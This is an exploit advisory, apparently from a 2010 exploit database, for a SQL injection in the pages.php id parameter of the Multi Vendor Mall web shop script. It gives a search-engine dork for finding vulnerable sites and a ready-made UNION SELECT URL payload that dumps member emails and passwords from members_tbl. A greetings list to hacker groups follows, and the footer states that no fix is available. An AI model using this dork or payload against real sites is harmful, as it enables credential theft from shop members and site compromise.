Multi Vendor Mall (pages.php id) SQL Injection Vulnerability

2010-05-26 09:35:45

============================================================
Multi Vendor Mall (pages.php) SQL Injection Vulnerability
============================================================


#################################################################################################

[+] Multi Vendor Mall (pages.php) SQL Injection Vulnerability

[+] By Newbie_Campuz

[+] Published: 2010-05-24 Pukul 22.00 WIB

[+] jatimcrew.org/

##################################################################################################

# Script Homepage:
# http://www.multishopcms.com

[+]Dork: pages.php?id= "Multi Vendor Mall"

[+] SQL Injection


http://[target]/[path]/pages.php?id=[SQL]

http://[target]/[path]/pages.php?id=-9999+union+select+group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e)+from+members_tbl--


Example :

http://[site]/pages.php?id=7+union+select+group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e)+from+members_tbl--

##################################################################################################
Thanks to Allah SWT n Nabi Muhammad SAW

Special Thanks to :
My Parent, My Brother n My Sister
Byz9991, Doraemon, Bang_Napi, Kenthot_cakep, Bom2, Shamus, Chapzha, Ficarciruas, pheonixhaxor, mywisdom,
Pr3tty, newbie_043, KidDevilz, Android2009, XcyberX, flyff666, MISTERFRIBO, Osean, Vhacx,jamsh0ut, elfata
cybermuttaqin,k3m4ngi, roentah,zhombhie, techno_x46 and YOU... !!!

All admin, momod, spamguard, staff and member Jatim Crew..
All admin, momod, spamguard, staff and member Indonesianhacker
All admin, momod, spamguard, staff and member xteamweb
All admin, momod, spamguard, staff and member h2ozones
All admin, momod, spamguard, staff and member master-forum
##################################################################################################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.